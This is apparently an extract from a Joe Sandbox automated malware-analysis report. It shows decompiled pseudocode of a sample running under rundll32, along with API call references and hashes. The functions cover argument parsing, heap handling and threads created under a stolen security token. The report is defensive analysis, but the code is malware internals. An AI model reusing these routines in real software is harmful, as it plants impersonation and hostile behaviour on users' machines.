                                                                                                          					_t22 = rand();
                                                                                                          					asm("cdq");
                                                                                                          					_t33 = 0x14;
                                                                                                          					 *((intOrPtr*)(_t37 + 0x22)) =  *((intOrPtr*)( *_a8 + 0x22)) + _t22 % _t33;
                                                                                                          					_t38 = 0;
                                                                                                          					do {
                                                                                                          						_t24 = rand();
                                                                                                          						_t34 = _v12;
                                                                                                          						 *(_t38 + _v12) = _t24;
                                                                                                          						_t38 = _t38 + 1;
                                                                                                          					} while (_t38 < 0x200);
                                                                                                          					if(E04A42F5A(_a4,  *_a8, _a12, 0, 0xff, 4, _t34, 0x200) != 0) {
                                                                                                          						_v5 = 1;
                                                                                                          					}
                                                                                                          					HeapFree(GetProcessHeap(), 8, _v12);
                                                                                                          				}
                                                                                                          				return _v5;
                                                                                                          			}










                                                                                                          0x04a4318a
                                                                                                          0x04a43195
                                                                                                          0x04a4319b
                                                                                                          0x04a431a0
                                                                                                          0x04a431ad
                                                                                                          0x04a431af
                                                                                                          0x04a431b3
                                                                                                          0x04a431b4
                                                                                                          0x04a431b7
                                                                                                          0x04a431bb
                                                                                                          0x04a431bd
                                                                                                          0x04a431bd
                                                                                                          0x04a431bf
                                                                                                          0x04a431c2
                                                                                                          0x04a431c5
                                                                                                          0x04a431c6
                                                                                                          0x04a431e9
                                                                                                          0x04a431eb
                                                                                                          0x04a431eb
                                                                                                          0x04a431fb
                                                                                                          0x04a431fb
                                                                                                          0x04a43206

                                                                                                          APIs
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000200,?,?,?,?,04A447E5,?,?,00000000,?,?,?,?,?,?), ref: 04A4318E
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,04A447E5,?,?,00000000,?,?,?,?,?,?,?,?), ref: 04A43195
                                                                                                          • rand.MSVCRT ref: 04A431AF
                                                                                                          • rand.MSVCRT ref: 04A431BD
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000000,000000FF,00000004,?,00000200,?,?,?,04A447E5,?,?,00000000,?), ref: 04A431F4
                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,04A447E5,?,?,00000000,?,?,?,?,?,?,?,?), ref: 04A431FB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Processrand$AllocFree
                                                                                                          • String ID: Oqt Uqt0Xqt
                                                                                                          • API String ID: 1335519115-636472023
                                                                                                          • Opcode ID: 152fd05ece68ee16097ba0fccd9768c2d326bbf8ccc09093ff0a38f8bb61a12d
                                                                                                          • Instruction ID: 0c7f166d1a815d8b079e589094b1b621e5e536d9ad350143412d91ed71c9ada9
                                                                                                          • Opcode Fuzzy Hash: 152fd05ece68ee16097ba0fccd9768c2d326bbf8ccc09093ff0a38f8bb61a12d
                                                                                                          • Instruction Fuzzy Hash: 5D11A536600305BBEB019F99CC45F9E7F79EFD5750F004058FA04AB180CB76A846C760
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 86%
                                                                                                          			E04A46BD1(void* __ecx, void* __esi) {
                                                                                                          				signed int _v8;
                                                                                                          				void* _t23;
                                                                                                          				intOrPtr* _t30;
                                                                                                          				intOrPtr* _t32;
                                                                                                          				intOrPtr* _t47;
                                                                                                          				void* _t52;
                                                                                                          
                                                                                                          				_t52 = __esi;
                                                                                                          				if(__esi != 0) {
                                                                                                          					if( *((intOrPtr*)(__esi + 0x18)) == 0) {
                                                                                                          						L11:
                                                                                                          						return HeapFree(GetProcessHeap(), 0, _t52);
                                                                                                          					}
                                                                                                          					_v8 = _v8 & 0x00000000;
                                                                                                          					if( *((intOrPtr*)(__esi + 0x24)) == 0) {
                                                                                                          						L10:
                                                                                                          						HeapFree(GetProcessHeap(), 0,  *(_t52 + 0x18));
                                                                                                          						goto L11;
                                                                                                          					} else {
                                                                                                          						goto L3;
                                                                                                          					}
                                                                                                          					do {
                                                                                                          						L3:
                                                                                                          						_t30 =  *(_t52 + 0x18) + _v8 * 4;
                                                                                                          						if( *_t30 != 0) {
                                                                                                          							_t32 =  *_t30;
                                                                                                          							if( *_t32 != 0) {
                                                                                                          								_t47 =  *((intOrPtr*)(_t52 + 0x30));
                                                                                                          								if(_t47 != 0) {
                                                                                                          									 *_t47( *_t32);
                                                                                                          								}
                                                                                                          								HeapFree(GetProcessHeap(), 0,  *( *( *(_t52 + 0x18) + _v8 * 4)));
                                                                                                          							}
                                                                                                          							HeapFree(GetProcessHeap(), 0,  *( *(_t52 + 0x18) + _v8 * 4));
                                                                                                          						}
                                                                                                          						_v8 = _v8 + 1;
                                                                                                          					} while (_v8 <  *((intOrPtr*)(_t52 + 0x24)));
                                                                                                          					goto L10;
                                                                                                          				}
                                                                                                          				return _t23;
                                                                                                          			}









                                                                                                          0x04a46bd1
                                                                                                          0x04a46bd7
                                                                                                          0x04a46bef
                                                                                                          0x04a46c53
                                                                                                          0x00000000
                                                                                                          0x04a46c5c
                                                                                                          0x04a46bf4
                                                                                                          0x04a46bfa
                                                                                                          0x04a46c49
                                                                                                          0x04a46c51
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a46bfc
                                                                                                          0x04a46bfc
                                                                                                          0x04a46c02
                                                                                                          0x04a46c08
                                                                                                          0x04a46c0a
                                                                                                          0x04a46c0f
                                                                                                          0x04a46c11
                                                                                                          0x04a46c16
                                                                                                          0x04a46c1a
                                                                                                          0x04a46c1a
                                                                                                          0x04a46c2c
                                                                                                          0x04a46c2c
                                                                                                          0x04a46c3c
                                                                                                          0x04a46c3c
                                                                                                          0x04a46c3e
                                                                                                          0x04a46c44
                                                                                                          0x00000000
                                                                                                          0x04a46bfc
                                                                                                          0x04a46c5e

                                                                                                          APIs
                                                                                                          • GetProcessHeap.KERNEL32(00000000,?,74714F20,77D44620,?,?,04A46CBD,?,?,00000000,?,04A47A55,00000024,04A46AA8,00000000,0000FFFF), ref: 04A46C29
                                                                                                          • HeapFree.KERNEL32(00000000,?,?,04A46CBD,?,?,00000000,?,04A47A55,00000024,04A46AA8,00000000,0000FFFF), ref: 04A46C2C
                                                                                                          • GetProcessHeap.KERNEL32(00000000,?,74714F20,77D44620,?,?,04A46CBD,?,?,00000000,?,04A47A55,00000024,04A46AA8,00000000,0000FFFF), ref: 04A46C39
                                                                                                          • HeapFree.KERNEL32(00000000,?,?,04A46CBD,?,?,00000000,?,04A47A55,00000024,04A46AA8,00000000,0000FFFF), ref: 04A46C3C
                                                                                                          • GetProcessHeap.KERNEL32(00000000,?,74714F20,77D44620,?,?,04A46CBD,?,?,00000000,?,04A47A55,00000024,04A46AA8,00000000,0000FFFF), ref: 04A46C4E
                                                                                                          • HeapFree.KERNEL32(00000000,?,?,04A46CBD,?,?,00000000,?,04A47A55,00000024,04A46AA8,00000000,0000FFFF), ref: 04A46C51
                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,74714F20,77D44620,?,?,04A46CBD,?,?,00000000,?,04A47A55,00000024,04A46AA8,00000000,0000FFFF), ref: 04A46C56
                                                                                                          • HeapFree.KERNEL32(00000000,?,?,04A46CBD,?,?,00000000,?,04A47A55,00000024,04A46AA8,00000000,0000FFFF), ref: 04A46C59
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$FreeProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 3859560861-0
                                                                                                          • Opcode ID: d7d5e5bd292041f0dbe33bdb581a2086b1f79576871dc4dc6be6435187e163d0
                                                                                                          • Instruction ID: 14887c4adaa002242e9cfa4b4da1f997f0732094c6aaf89a86f0015be5586578
                                                                                                          • Opcode Fuzzy Hash: d7d5e5bd292041f0dbe33bdb581a2086b1f79576871dc4dc6be6435187e163d0
                                                                                                          • Instruction Fuzzy Hash: B1114635600308EFDB24EF96C980F6AB3B9EFCA341F010458E4059B6A1CB78FD44CA60
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E04A4652F(void* __ecx, signed int _a4) {
                                                                                                          				int _v8;
                                                                                                          				WCHAR** _v12;
                                                                                                          				intOrPtr* _t20;
                                                                                                          				int _t26;
                                                                                                          				WCHAR** _t28;
                                                                                                          				WCHAR* _t32;
                                                                                                          				void* _t39;
                                                                                                          				intOrPtr _t42;
                                                                                                          				void* _t45;
                                                                                                          				WCHAR* _t52;
                                                                                                          				WCHAR* _t53;
                                                                                                          
                                                                                                          				if(_a4 == 0) {
                                                                                                          					L20:
                                                                                                          					if( *0x4a57bc4 == 0) {
                                                                                                          						 *0x4a57bc4 = 0x2d;
                                                                                                          					}
                                                                                                          					return 0;
                                                                                                          				} else {
                                                                                                          					_t20 = _a4;
                                                                                                          					_t45 = _t20 + 2;
                                                                                                          					do {
                                                                                                          						_t42 =  *_t20;
                                                                                                          						_t20 = _t20 + 2;
                                                                                                          					} while (_t42 != 0);
                                                                                                          					if(_t20 == _t45) {
                                                                                                          						goto L20;
                                                                                                          					}
                                                                                                          					_v8 = 0;
                                                                                                          					_t39 = CommandLineToArgvW(_a4,  &_v8);
                                                                                                          					if(_t39 == 0) {
                                                                                                          						L19:
                                                                                                          						goto L20;
                                                                                                          					}
                                                                                                          					if(_v8 <= 0) {
                                                                                                          						L18:
                                                                                                          						LocalFree(_t39);
                                                                                                          						goto L19;
                                                                                                          					}
                                                                                                          					_t26 = StrToIntW( *_t39);
                                                                                                          					_t44 = 1;
                                                                                                          					_a4 = 1;
                                                                                                          					if(_t26 > 0) {
                                                                                                          						 *0x4a57bc4 = _t26;
                                                                                                          					}
                                                                                                          					if(_v8 > _t44) {
                                                                                                          						do {
                                                                                                          							_t28 = _t39 + _a4 * 4;
                                                                                                          							_t52 =  *_t28;
                                                                                                          							_v12 = _t28;
                                                                                                          							if(_t52 != StrStrW(_t52, L"-h")) {
                                                                                                          								_t53 =  *_v12;
                                                                                                          								if(_t53 != StrStrW(_t53, L"-f")) {
                                                                                                          									_t32 = StrChrW(_t53, 0x3a);
                                                                                                          									if(_t32 != 0) {
                                                                                                          										_t44 = 0;
                                                                                                          										 *_t32 = 0;
                                                                                                          										E04A469AE(_t53,  &(_t32[1]), 1);
                                                                                                          									}
                                                                                                          								} else {
                                                                                                          									 *0x4a57b7c =  *0x4a57b7c & 0xfffffffd;
                                                                                                          								}
                                                                                                          							} else {
                                                                                                          								E04A464A6(_t52, _t44);
                                                                                                          							}
                                                                                                          							_a4 =  &(_a4[0]);
                                                                                                          						} while (_a4 < _v8);
                                                                                                          					}
                                                                                                          					goto L18;
                                                                                                          				}
                                                                                                          			}














                                                                                                          0x04a4653a
                                                                                                          0x04a4660e
                                                                                                          0x04a46616
                                                                                                          0x04a46618
                                                                                                          0x04a46618
                                                                                                          0x04a46625
                                                                                                          0x04a46540
                                                                                                          0x04a46540
                                                                                                          0x04a46543
                                                                                                          0x04a46546
                                                                                                          0x04a46546
                                                                                                          0x04a46549
                                                                                                          0x04a4654c
                                                                                                          0x04a46555
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a46563
                                                                                                          0x04a4656c
                                                                                                          0x04a46570
                                                                                                          0x04a4660d
                                                                                                          0x00000000
                                                                                                          0x04a4660d
                                                                                                          0x04a46579
                                                                                                          0x04a46606
                                                                                                          0x04a46607
                                                                                                          0x00000000
                                                                                                          0x04a46607
                                                                                                          0x04a46581
                                                                                                          0x04a46589
                                                                                                          0x04a4658a
                                                                                                          0x04a4658f
                                                                                                          0x04a46591
                                                                                                          0x04a46591
                                                                                                          0x04a46599
                                                                                                          0x04a465a2
                                                                                                          0x04a465a5
                                                                                                          0x04a465a8
                                                                                                          0x04a465b0
                                                                                                          0x04a465b7
                                                                                                          0x04a465c5
                                                                                                          0x04a465d1
                                                                                                          0x04a465df
                                                                                                          0x04a465e7
                                                                                                          0x04a465e9
                                                                                                          0x04a465eb
                                                                                                          0x04a465f5
                                                                                                          0x04a465f5
                                                                                                          0x04a465d3
                                                                                                          0x04a465d3
                                                                                                          0x04a465d3
                                                                                                          0x04a465b9
                                                                                                          0x04a465bb
                                                                                                          0x04a465bb
                                                                                                          0x04a465fa
                                                                                                          0x04a46600
                                                                                                          0x04a46605
                                                                                                          0x00000000
                                                                                                          0x04a46599

                                                                                                          APIs
                                                                                                          • CommandLineToArgvW.SHELL32(?,?,00000000,?,?,?,?,04A47A8E,?), ref: 04A46566
                                                                                                          • StrToIntW.SHLWAPI(00000000,?,?,?,?,04A47A8E,?), ref: 04A46581
                                                                                                          • StrStrW.SHLWAPI(00000000,04A51580,?,?,?,?,?,04A47A8E,?), ref: 04A465B3
                                                                                                          • StrStrW.SHLWAPI(00000000,04A51588,?,?,?,?,?,04A47A8E,?), ref: 04A465CD
                                                                                                          • StrChrW.SHLWAPI(00000000,0000003A,?,?,?,?,?,04A47A8E,?), ref: 04A465DF
                                                                                                          • LocalFree.KERNEL32(00000000,?,?,?,?,04A47A8E,?), ref: 04A46607
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArgvCommandFreeLineLocal
                                                                                                          • String ID:
                                                                                                          • API String ID: 1203019955-0
                                                                                                          • Opcode ID: 314dbf8ff90097d997314973b6754d5a3d27206e8065b7adaf8994e32cdad9cd
                                                                                                          • Instruction ID: b8be13f0da0a38567e90860a9fa023ed17ab405e433b488e1ccee92252df12ed
                                                                                                          • Opcode Fuzzy Hash: 314dbf8ff90097d997314973b6754d5a3d27206e8065b7adaf8994e32cdad9cd
                                                                                                          • Instruction Fuzzy Hash: D931A535600215FFDB25DF64DA449ADB768FFEA755F108065E802EB240D778FA418B81
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 87%
                                                                                                          			E04A498AB(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                          				void* _v8;
                                                                                                          				void*** _v12;
                                                                                                          				intOrPtr _v16;
                                                                                                          				intOrPtr _v28;
                                                                                                          				void _v32;
                                                                                                          				void* __ebx;
                                                                                                          				void* __esi;
                                                                                                          				intOrPtr _t22;
                                                                                                          				void* _t29;
                                                                                                          				struct _SECURITY_ATTRIBUTES* _t39;
                                                                                                          				void _t41;
                                                                                                          				void* _t44;
                                                                                                          
                                                                                                          				_t39 = 0;
                                                                                                          				_t41 = 0;
                                                                                                          				_v12 = 0;
                                                                                                          				_t22 = E04A46CED(0,  &_v12);
                                                                                                          				_v16 = _t22;
                                                                                                          				if(_t22 == 0) {
                                                                                                          					L12:
                                                                                                          					return _t41;
                                                                                                          				}
                                                                                                          				while(1) {
                                                                                                          					_t44 =  *( *_v12);
                                                                                                          					_v32 = _t39;
                                                                                                          					asm("stosd");
                                                                                                          					asm("stosd");
                                                                                                          					asm("stosd");
                                                                                                          					_v28 = _a4;
                                                                                                          					_t29 = CreateThread(_t39, _t39, E04A4988B,  &_v32, 4, _t39);
                                                                                                          					_v8 = _t29;
                                                                                                          					if(_t29 != _t39) {
                                                                                                          						if(SetThreadToken( &_v8, _t44) != 0) {
                                                                                                          							if(ResumeThread(_v8) == 0xffffffff) {
                                                                                                          								GetLastError();
                                                                                                          							} else {
                                                                                                          								WaitForSingleObject(_v8, 0xffffffff);
                                                                                                          							}
                                                                                                          						}
                                                                                                          						CloseHandle(_v8);
                                                                                                          					}
                                                                                                          					_t41 = _v32;
                                                                                                          					if(_t41 != _t39 || E04A46D35(_v16, _a8,  &_v12) == 0) {
                                                                                                          						break;
                                                                                                          					}
                                                                                                          					_t39 = 0;
                                                                                                          				}
                                                                                                          				E04A46B46(_v16);
                                                                                                          				goto L12;
                                                                                                          			}















                                                                                                          0x04a498ba
                                                                                                          0x04a498be
                                                                                                          0x04a498c0
                                                                                                          0x04a498c3
                                                                                                          0x04a498c8
                                                                                                          0x04a498cd
                                                                                                          0x04a49969
                                                                                                          0x04a4996f
                                                                                                          0x04a4996f
                                                                                                          0x04a498d7
                                                                                                          0x04a498dc
                                                                                                          0x04a498e0
                                                                                                          0x04a498e6
                                                                                                          0x04a498e7
                                                                                                          0x04a498e8
                                                                                                          0x04a498ef
                                                                                                          0x04a498fd
                                                                                                          0x04a49903
                                                                                                          0x04a49908
                                                                                                          0x04a49917
                                                                                                          0x04a49925
                                                                                                          0x04a49934
                                                                                                          0x04a49927
                                                                                                          0x04a4992c
                                                                                                          0x04a4992c
                                                                                                          0x04a49925
                                                                                                          0x04a4993d
                                                                                                          0x04a4993d
                                                                                                          0x04a49943
                                                                                                          0x04a49948
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a498d5
                                                                                                          0x04a498d5
                                                                                                          0x04a49964
                                                                                                          0x00000000

                                                                                                          APIs
                                                                                                            • Part of subcall function 04A46CED: GetProcessHeap.KERNEL32(00000008,00000008,00000000,74714F20,?,04A46B24,00000000,00000000,77D44620,?,?,04A4A222,00000000), ref: 04A46CFC
                                                                                                            • Part of subcall function 04A46CED: HeapAlloc.KERNEL32(00000000,?,04A46B24,00000000,00000000,77D44620,?,?,04A4A222,00000000), ref: 04A46CFF
                                                                                                            • Part of subcall function 04A46CED: GetProcessHeap.KERNEL32(00000000,00000000,?,?,04A46B24,00000000,00000000,77D44620,?,?,04A4A222,00000000), ref: 04A46D24
                                                                                                            • Part of subcall function 04A46CED: HeapFree.KERNEL32(00000000,?,04A46B24,00000000,00000000,77D44620,?,?,04A4A222,00000000), ref: 04A46D27
                                                                                                          • CreateThread.KERNEL32 ref: 04A498FD
                                                                                                          • SetThreadToken.ADVAPI32(?,?,?,04A4A15C,?,?), ref: 04A4990F
                                                                                                          • ResumeThread.KERNEL32(?,?,04A4A15C,?,?), ref: 04A4991C
                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,04A4A15C,?,?), ref: 04A4992C
                                                                                                          • GetLastError.KERNEL32(?,04A4A15C,?,?), ref: 04A49934
                                                                                                          • CloseHandle.KERNEL32(?,?,04A4A15C,?,?), ref: 04A4993D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Thread$Process$AllocCloseCreateErrorFreeHandleLastObjectResumeSingleTokenWait
                                                                                                          • String ID:
                                                                                                          • API String ID: 298440786-0
                                                                                                          • Opcode ID: 900e532e3c07290d7b767b56cc151351d229be4bd8be6b490177ef95f58ad61c
                                                                                                          • Instruction ID: d58a003bca92c0039402cba708da7f675c8502812cef6863fb7774a6853d62bc
                                                                                                          • Opcode Fuzzy Hash: 900e532e3c07290d7b767b56cc151351d229be4bd8be6b490177ef95f58ad61c
                                                                                                          • Instruction Fuzzy Hash: 5A214FB6A00209BFDB009FF8D98489FBBBDEFC9324F104565EA11E7260D734AE158B50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E04A46735(WCHAR* _a4, intOrPtr _a8) {
                                                                                                          				short _v2052;
                                                                                                          				void* _t10;
                                                                                                          				intOrPtr* _t13;
                                                                                                          				WCHAR* _t16;
                                                                                                          				WCHAR* _t22;
                                                                                                          				intOrPtr _t29;
                                                                                                          				short _t30;
                                                                                                          				void* _t33;
                                                                                                          				short* _t34;
                                                                                                          				signed int _t36;
                                                                                                          				signed int _t39;
                                                                                                          
                                                                                                          				_t10 = E04A46477();
                                                                                                          				if(_t10 < 0xf) {
                                                                                                          					_t10 = 0xf;
                                                                                                          				}
                                                                                                          				wsprintfW( &_v2052, L"%d", _t10);
                                                                                                          				_t13 =  &_v2052;
                                                                                                          				_t33 = _t13 + 2;
                                                                                                          				do {
                                                                                                          					_t29 =  *_t13;
                                                                                                          					_t13 = _t13 + 2;
                                                                                                          				} while (_t29 != 0);
                                                                                                          				_t39 = _t13 - _t33 >> 1;
                                                                                                          				EnterCriticalSection(0x4a57b9c);
                                                                                                          				_t46 =  *0x4a53010;
                                                                                                          				if( *0x4a53010 != 0) {
                                                                                                          					E04A46628(_t29, _t46);
                                                                                                          				}
                                                                                                          				_t16 = 0x4a53b90;
                                                                                                          				_t4 =  &(_t16[1]); // 0x4a53b92
                                                                                                          				_t34 = _t4;
                                                                                                          				do {
                                                                                                          					_t30 =  *_t16;
                                                                                                          					_t16 =  &(_t16[1]);
                                                                                                          				} while (_t30 != 0);
                                                                                                          				_t36 = (_t16 - _t34 >> 1) + _t39;
                                                                                                          				if(_t36 >= _a8 - 1) {
                                                                                                          					SetLastError(0x7a);
                                                                                                          				} else {
                                                                                                          					_t22 = _a4;
                                                                                                          					 *_t22 = 0;
                                                                                                          					StrCatW(_t22,  &_v2052);
                                                                                                          					StrCatW(_a4, 0x4a53b90);
                                                                                                          					_t39 = _t36;
                                                                                                          				}
                                                                                                          				LeaveCriticalSection(0x4a57b9c);
                                                                                                          				return _t39;
                                                                                                          			}














                                                                                                          0x04a4673e
                                                                                                          0x04a46746
                                                                                                          0x04a4674a
                                                                                                          0x04a4674a
                                                                                                          0x04a46758
                                                                                                          0x04a4675e
                                                                                                          0x04a46767
                                                                                                          0x04a4676a
                                                                                                          0x04a4676a
                                                                                                          0x04a4676d
                                                                                                          0x04a46770
                                                                                                          0x04a46781
                                                                                                          0x04a46783
                                                                                                          0x04a46789
                                                                                                          0x04a46790
                                                                                                          0x04a46792
                                                                                                          0x04a46792
                                                                                                          0x04a4679c
                                                                                                          0x04a4679e
                                                                                                          0x04a4679e
                                                                                                          0x04a467a1
                                                                                                          0x04a467a1
                                                                                                          0x04a467a4
                                                                                                          0x04a467a7
                                                                                                          0x04a467b0
                                                                                                          0x04a467b9
                                                                                                          0x04a467df
                                                                                                          0x04a467bb
                                                                                                          0x04a467bb
                                                                                                          0x04a467c6
                                                                                                          0x04a467d1
                                                                                                          0x04a467d7
                                                                                                          0x04a467d9
                                                                                                          0x04a467d9
                                                                                                          0x04a467ea
                                                                                                          0x04a467f6

                                                                                                          APIs
                                                                                                            • Part of subcall function 04A46477: GetTickCount.KERNEL32 ref: 04A46477
                                                                                                          • wsprintfW.USER32 ref: 04A46758
                                                                                                          • EnterCriticalSection.KERNEL32(04A57B9C,00007FD3,?,00000028), ref: 04A46783
                                                                                                          • StrCatW.SHLWAPI(?,?), ref: 04A467D1
                                                                                                          • StrCatW.SHLWAPI(?,04A53B90), ref: 04A467D7
                                                                                                          • SetLastError.KERNEL32(0000007A), ref: 04A467DF
                                                                                                          • LeaveCriticalSection.KERNEL32(04A57B9C), ref: 04A467EA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$CountEnterErrorLastLeaveTickwsprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 230659905-0
                                                                                                          • Opcode ID: e638e7f6a94c0c7f23c0dcdbe89d73b059022ab411696414071b4b84f809979f
                                                                                                          • Instruction ID: 28417d104955593ad5fe9231e8ffea2db398cd88756bbf978556c4b6a95cd848
                                                                                                          • Opcode Fuzzy Hash: e638e7f6a94c0c7f23c0dcdbe89d73b059022ab411696414071b4b84f809979f
                                                                                                          • Instruction Fuzzy Hash: CC1100B6A00204ABDB106BA8DD49BAE37A8FFD5345F008851F946DB150EAB8BD04CF80
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E04A4A3B1(void* __ecx, void* _a4) {
                                                                                                          				void* _v8;
                                                                                                          				void* _t9;
                                                                                                          				long _t18;
                                                                                                          
                                                                                                          				_v8 = 0;
                                                                                                          				_t18 = 0;
                                                                                                          				_t9 = CreateThread(0, 0, E04A4A016, 0, 4, 0);
                                                                                                          				_v8 = _t9;
                                                                                                          				if(_t9 == 0) {
                                                                                                          					_t18 = 0x57;
                                                                                                          				} else {
                                                                                                          					if(SetThreadToken( &_v8, _a4) == 0) {
                                                                                                          						_t18 = GetLastError();
                                                                                                          						goto L5;
                                                                                                          					} else {
                                                                                                          						if(ResumeThread(_v8) == 0xffffffff) {
                                                                                                          							L5:
                                                                                                          							CloseHandle(_v8);
                                                                                                          							_v8 = 0;
                                                                                                          						}
                                                                                                          					}
                                                                                                          				}
                                                                                                          				SetLastError(_t18);
                                                                                                          				return _v8;
                                                                                                          			}






                                                                                                          0x04a4a3c4
                                                                                                          0x04a4a3c7
                                                                                                          0x04a4a3c9
                                                                                                          0x04a4a3cf
                                                                                                          0x04a4a3d4
                                                                                                          0x04a4a40f
                                                                                                          0x04a4a3d6
                                                                                                          0x04a4a3e5
                                                                                                          0x04a4a3fd
                                                                                                          0x00000000
                                                                                                          0x04a4a3e7
                                                                                                          0x04a4a3f3
                                                                                                          0x04a4a3ff
                                                                                                          0x04a4a402
                                                                                                          0x04a4a408
                                                                                                          0x04a4a408
                                                                                                          0x04a4a3f3
                                                                                                          0x04a4a3e5
                                                                                                          0x04a4a411
                                                                                                          0x04a4a41d

                                                                                                          APIs
                                                                                                          • CreateThread.KERNEL32 ref: 04A4A3C9
                                                                                                          • SetThreadToken.ADVAPI32(?,?,?,?,04A47B43,?,?,00000004,04A4787C,00000000,000000FF), ref: 04A4A3DD
                                                                                                          • ResumeThread.KERNEL32(?,?,?,04A47B43,?,?,00000004,04A4787C,00000000,000000FF), ref: 04A4A3EA
                                                                                                          • GetLastError.KERNEL32(?,?,04A47B43,?,?,00000004,04A4787C,00000000,000000FF), ref: 04A4A3F7
                                                                                                          • CloseHandle.KERNEL32(?,?,?,04A47B43,?,?,00000004,04A4787C,00000000,000000FF), ref: 04A4A402
                                                                                                          • SetLastError.KERNEL32(00000057,?,?,04A47B43,?,?,00000004,04A4787C,00000000,000000FF), ref: 04A4A411
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
